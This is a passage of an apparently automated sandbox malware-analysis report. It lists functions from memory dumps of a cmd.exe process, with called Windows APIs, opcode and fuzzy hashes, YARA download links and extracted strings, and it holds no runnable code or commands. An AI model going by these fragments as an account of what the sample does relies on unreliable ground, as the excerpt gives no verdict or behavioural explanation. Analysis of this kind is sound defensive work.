                                                                        • Instruction Fuzzy Hash: D8313279A00609DFDB00DFD8DC80DEEB7B9BF88304B108559EA05E7244D775EA45CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284E630 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0284E647
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 2538663250-2016760708
                                                                        • Opcode ID: a92d46da9632d06b8151a11b4dedd4a856aa46f093c95b5486c85939da8b5b9a
                                                                        • Instruction ID: a384f9dbeeee5c62dec72f1ff046b6cc52b0621b8904621db174e76ef1aa8616
                                                                        • Opcode Fuzzy Hash: a92d46da9632d06b8151a11b4dedd4a856aa46f093c95b5486c85939da8b5b9a
                                                                        • Instruction Fuzzy Hash: 02311079A006099FDB00DFD8D880DEEB7B9BF88304B108559EA05E7254DB75AA05CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02841040 Relevance: 1.8, APIs: 1, Instructions: 267networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: db6a1bae41a569e943a94a2c7569583de2664da14132bacb5b971e8e1956401f
                                                                        • Instruction ID: 2937fed877937825976707824114e178f8fb3a8a7200deee73f0a6932d7de2d5
                                                                        • Opcode Fuzzy Hash: db6a1bae41a569e943a94a2c7569583de2664da14132bacb5b971e8e1956401f
                                                                        • Instruction Fuzzy Hash: 0E9143BDE00219ABDB15DFA8CC44BEEB7B5AF08744F144129E90CE7240EB746685CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284103B Relevance: 1.8, APIs: 1, Instructions: 262networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: d028bb36a33c09b9eb25ca0399b605445c9ff9a1713327381dff359f7f122d1b
                                                                        • Instruction ID: fa3e37041bb556fb7235a6b5866c88c154d509f842470be8bd0fabecb1de463f
                                                                        • Opcode Fuzzy Hash: d028bb36a33c09b9eb25ca0399b605445c9ff9a1713327381dff359f7f122d1b
                                                                        • Instruction Fuzzy Hash: FD9153BDD00219ABDB14DFA8CC44BEEBBB5AF08744F144129E90CE7240EB746685CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028412AD Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: 31a6d184ab798ab025a22dddd7c6b7f71f86800ac270208832e9b62ef0a62e6d
                                                                        • Instruction ID: d71ac27e8b107a35f9d47ae70def05b22b53438096db24141a2c682a796de8e2
                                                                        • Opcode Fuzzy Hash: 31a6d184ab798ab025a22dddd7c6b7f71f86800ac270208832e9b62ef0a62e6d
                                                                        • Instruction Fuzzy Hash: 1811C47DD05219AFDB01DBE88C81BDEB7F9AF09714F140156D908F3141EB61AA488BEA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02843E60 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02843ED2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 74a1e5119f22510537e3e9e71567fc666ae6a69bd96f0efb277ed7411773a2b3
                                                                        • Instruction ID: 79974530e66f32c8aed8e2f81e2d5fefc9c0668506752ca302d3492dd183184c
                                                                        • Opcode Fuzzy Hash: 74a1e5119f22510537e3e9e71567fc666ae6a69bd96f0efb277ed7411773a2b3
                                                                        • Instruction Fuzzy Hash: 7A011EBDE4020DABDF14EBA4DC81F9EB3B99B44308F104295AD08D7641FA71EB54CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857E00 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02847753,00000010,?,?,?,00000044,?,00000010,02847753,?,?,?), ref: 02857E60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 0bee5aa62eb7a68b3eb11ec3a28003d3c1e70a85095e1c32f088f8dbbb160fa5
                                                                        • Instruction ID: 9d68e07acf9a8551ebb564b8567265c5cb01d8d3b6409cc03f29dffb062e7959
                                                                        • Opcode Fuzzy Hash: 0bee5aa62eb7a68b3eb11ec3a28003d3c1e70a85095e1c32f088f8dbbb160fa5
                                                                        • Instruction Fuzzy Hash: 0C0172B6204108BBCB44DE99DC80EDB77ADAF8C754F518208BA09D3240D630E8518BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028393D0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02839415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: cc356b699687411f09895b20681620837888c3ba7ed30d4cffb3667db5f715c7
                                                                        • Instruction ID: ebe2f33ff104f5134725c7c930cb481b0d20af8fe904ca9cc43ea0efac2abf49
                                                                        • Opcode Fuzzy Hash: cc356b699687411f09895b20681620837888c3ba7ed30d4cffb3667db5f715c7
                                                                        • Instruction Fuzzy Hash: 1DF06D7B38031436E23161AD9C02FDBB79DDB84BB1F244426FB0CEB1C0D991B9424AE9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028393CD Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02839415
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 3c602b2bd6be7cc81fb36faa83d514dff230c528f19ca1bac33cba31f5391786
                                                                        • Instruction ID: 96205dec55f6ecde610d6380ccaaa372beaae6bbcff3d806582a4ab82e04695a
                                                                        • Opcode Fuzzy Hash: 3c602b2bd6be7cc81fb36faa83d514dff230c528f19ca1bac33cba31f5391786
                                                                        • Instruction Fuzzy Hash: C6E0927B78021036E271619C8C42FEB669A9B84B61F204015FB0CEB1C0D991B9424AE9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857D20 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(02841099,?,0285496F,02841099,028540B7,0285496F,?,02841099,028540B7,00001000,?,?,02859606), ref: 02857D5C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 88ebfb8f9c9b83f5b57b70436600ca74cfd9b47edb27a84e6257e06cdcfa62f4
                                                                        • Instruction ID: 56a89355ea18c9608d1ae20ee72f7e5b93beedbce7fee2d88c3f873606ed5167
                                                                        • Opcode Fuzzy Hash: 88ebfb8f9c9b83f5b57b70436600ca74cfd9b47edb27a84e6257e06cdcfa62f4
                                                                        • Instruction Fuzzy Hash: 60E039752042087BD614EA59DC40F9B33ADDBC9710F004009FA08A7282CA30B9158AB9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02857D70 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0038B91C,00000007,00000000,00000004,00000000,02843741,000000F4,?,?,?,?,?), ref: 02857DAF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 5dacfb748006c6bb6ab6068bed5d9032331827d33326bd30cfa66d75f0c9dd16
                                                                        • Instruction ID: 4d772584b58c1c459cd248398f5bd543e10bde45eb1c3688761f3c6c487bdcad
                                                                        • Opcode Fuzzy Hash: 5dacfb748006c6bb6ab6068bed5d9032331827d33326bd30cfa66d75f0c9dd16
                                                                        • Instruction Fuzzy Hash: F9E06D752002087BD610EE59DC41F9B37ADDFC4710F004419FA08E7241CA30B9108AB9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02847790 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 028477BC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 6f86805815b59758952611a47c7c36cd6d00460bb31b5773962a9047a25d1829
                                                                        • Instruction ID: 872f9713a09c4bca78f7209e8b9a214a4fc4d049d49ba7b6b0a82f85b325457e
                                                                        • Opcode Fuzzy Hash: 6f86805815b59758952611a47c7c36cd6d00460bb31b5773962a9047a25d1829
                                                                        • Instruction Fuzzy Hash: 8CE0807D14020C1BF7245578DC45F763358474CB24F644550B91CDB1C1DB74F5414590
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02841362 Relevance: 1.5, APIs: 1, Instructions: 25networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000202,?), ref: 0284134A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Startup
                                                                        • String ID:
                                                                        • API String ID: 724789610-0
                                                                        • Opcode ID: c21aa5e7eb6eb1d8434e872a7158fe5c54a6173fa7f3692df5039f58f5884257
                                                                        • Instruction ID: 8f841cedce70063609bfc5e15f5c034158a3f382bb1b9e5b68675d921bcf9884
                                                                        • Opcode Fuzzy Hash: c21aa5e7eb6eb1d8434e872a7158fe5c54a6173fa7f3692df5039f58f5884257
                                                                        • Instruction Fuzzy Hash: 60C0125E75602C5BE41069596C4F8BE660CC6E682D704067AED09E6942F946C82D05A7
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284759C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02841390,028567D7,028540B7,?), ref: 028475D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 131b28b20346e1a1762af8c65d098b22fd3d1ee0b5f458f20673503aa75a03be
                                                                        • Instruction ID: 4c4405a5dd754832d91d693ccd10a606233ff178d2e77dcec3532a0cabded61e
                                                                        • Opcode Fuzzy Hash: 131b28b20346e1a1762af8c65d098b22fd3d1ee0b5f458f20673503aa75a03be
                                                                        • Instruction Fuzzy Hash: 44E0C2796402082BE62096B98C06FAA629D5B50760F15847CB90DE7282DD51A5008AB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028475A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02841390,028567D7,028540B7,?), ref: 028475D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: f1d228bd7c295cbc55401242731b959f806bcf252755ec483891b56be3d5598e
                                                                        • Instruction ID: 9697f0edc5bb4e049595e963f4ee441ae1e75272965cd475392d36719d8ac892
                                                                        • Opcode Fuzzy Hash: f1d228bd7c295cbc55401242731b959f806bcf252755ec483891b56be3d5598e
                                                                        • Instruction Fuzzy Hash: DAD05E792803083BF650A6B9CC06FA6328D5B04765F158474BA0CEB2C2ED55F50089BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f1397c18bdaaeb6435ca11316d733a1a09152124b47f80d7b3e27198a3804bf7
                                                                        • Instruction ID: 6cb4371fa7d4e572c5d13b1424c38349f62ce303468b98e652b307a83b2a5e57
                                                                        • Opcode Fuzzy Hash: f1397c18bdaaeb6435ca11316d733a1a09152124b47f80d7b3e27198a3804bf7
                                                                        • Instruction Fuzzy Hash: 0FB09B719015C5C7DA11E7604708717790467D4701F29C461F2130641E4779C1D1E575
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 03182349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 8d2a0aa4f4ad8b00d1fa4e7dbc60bfe947b1528db6e9ba0a5c49fd8ce3ba8f95
                                                                        • Instruction ID: 167db6768a8404cba26ee8d7d960b04c78e5b10b4a609db8a831a211ad1f7b80
                                                                        • Opcode Fuzzy Hash: 8d2a0aa4f4ad8b00d1fa4e7dbc60bfe947b1528db6e9ba0a5c49fd8ce3ba8f95
                                                                        • Instruction Fuzzy Hash: 04929D79604741AFD726EF14C880B6AB7E8BB8C714F084D2DFA949B250D770E845CF9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03138620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • corrupted critical section, xrefs: 031754C2
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 03175543
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 031754E2
                                                                        • Critical section address, xrefs: 03175425, 031754BC, 03175534
                                                                        • undeleted critical section in freed memory, xrefs: 0317542B
                                                                        • Critical section debug info address, xrefs: 0317541F, 0317552E
                                                                        • Critical section address., xrefs: 03175502
                                                                        • Invalid debug info address of this critical section, xrefs: 031754B6
                                                                        • double initialized or corrupted critical section, xrefs: 03175508
                                                                        • Thread identifier, xrefs: 0317553A
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 031754CE
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0317540A, 03175496, 03175519
                                                                        • Address of the debug info found in the active list., xrefs: 031754AE, 031754FA
                                                                        • 8, xrefs: 031752E3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: 02e7e3ee980138a6a49eed49c6dc2d7d5db27e41ace06bc5f19a5a8aaf4bd255
                                                                        • Instruction ID: 1ec407ca4ce13fcf45edce57f6024dab15404425d06d536bad3fcf0ef34ca307
                                                                        • Opcode Fuzzy Hash: 02e7e3ee980138a6a49eed49c6dc2d7d5db27e41ace06bc5f19a5a8aaf4bd255
                                                                        • Instruction Fuzzy Hash: 9981AEB1A41358EFDB24CF94C840BAEBBBAFB49B14F188159F518BB641D371A940CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 7cdd5d8216e1e8b150f072a0ff10cad1d66666c6302fcc16243e2e7303814062
                                                                        • Instruction ID: e2bef52422f0f10fb7e5f79ee6a8bb1b14ecfc064a7da49bcd36daa97cef43da
                                                                        • Opcode Fuzzy Hash: 7cdd5d8216e1e8b150f072a0ff10cad1d66666c6302fcc16243e2e7303814062
                                                                        • Instruction Fuzzy Hash: 7051C07A505B119BC329DF1CC844BABBBECEF8C645F18491DE899C7284E770D644CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 0-1700792311
                                                                        • Opcode ID: 7934c4857279868fa159cdcf6918a8c120b5fcbeb1a04897c0c03a4c3658a4a3
                                                                        • Instruction ID: 7cc9be415c80573ba7a94973cff180f9f4c3c502b8b13e006e69540c3da88e36
                                                                        • Opcode Fuzzy Hash: 7934c4857279868fa159cdcf6918a8c120b5fcbeb1a04897c0c03a4c3658a4a3
                                                                        • Instruction Fuzzy Hash: 1ED1A9395057859FCB1AEF68C440AEEFBF1FF4E710F088059E5559B652CB349981CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 03188B8F
                                                                        • VerifierDlls, xrefs: 03188CBD
                                                                        • VerifierDebug, xrefs: 03188CA5
                                                                        • VerifierFlags, xrefs: 03188C50
                                                                        • HandleTraces, xrefs: 03188C8F
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 03188A67
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 03188A3D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                        • API String ID: 0-3223716464
                                                                        • Opcode ID: 4255c7d7122c6904b87bded16bfe9b03ea0148a791891a5733bd50b1cd379cc6
                                                                        • Instruction ID: fea5444e9793458f01c2dfa7b2751788c40ceab36f0097dbad274a55bbf85f88
                                                                        • Opcode Fuzzy Hash: 4255c7d7122c6904b87bded16bfe9b03ea0148a791891a5733bd50b1cd379cc6
                                                                        • Instruction Fuzzy Hash: 41911372642711AFD325FF288880BAAB7E9EB8D754F850658EA546F241C730D8418FA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0310EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                        • API String ID: 0-1109411897
                                                                        • Opcode ID: 8af2dba8d6053a01251c384b3f3efc9b05f43287f294836e2c81bf5839dce058
                                                                        • Instruction ID: d0a45edc696c05616a6409f1d86da76c1c5e1e3560758635ede40c8c9360c405
                                                                        • Opcode Fuzzy Hash: 8af2dba8d6053a01251c384b3f3efc9b05f43287f294836e2c81bf5839dce058
